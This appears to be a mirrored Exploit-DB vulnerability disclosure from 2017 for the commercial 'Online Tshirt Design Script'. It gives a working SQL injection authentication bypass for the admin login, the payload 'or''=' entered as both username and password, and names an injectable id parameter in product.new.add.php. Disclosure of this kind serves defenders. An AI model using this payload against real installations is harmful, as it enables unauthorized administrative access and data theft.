Online Tshirt Design Script – SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-01-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41110/
  • # # # # # 
    # Vulnerability: SQL Injection + Authentication Bypass
    # Date: 18.01.2017
    # Vendor Homepage: http://www.scriptgiant.com/
    # Script Name: Online Tshirt Design Script
    # Script Buy Now: http://www.popularclones.com/products/Online-Tshirt-Designer
    # Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # Authentication Bypass :
    # http://localhost/[PATH]/admin/ and set Username:'or''=' and Password to 'or''=' and hit enter.
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/admin/product.new.add.php?id=[SQL]
    # E.t.c.... Other files, too. SQL There are security vulnerabilities.
    # # # # #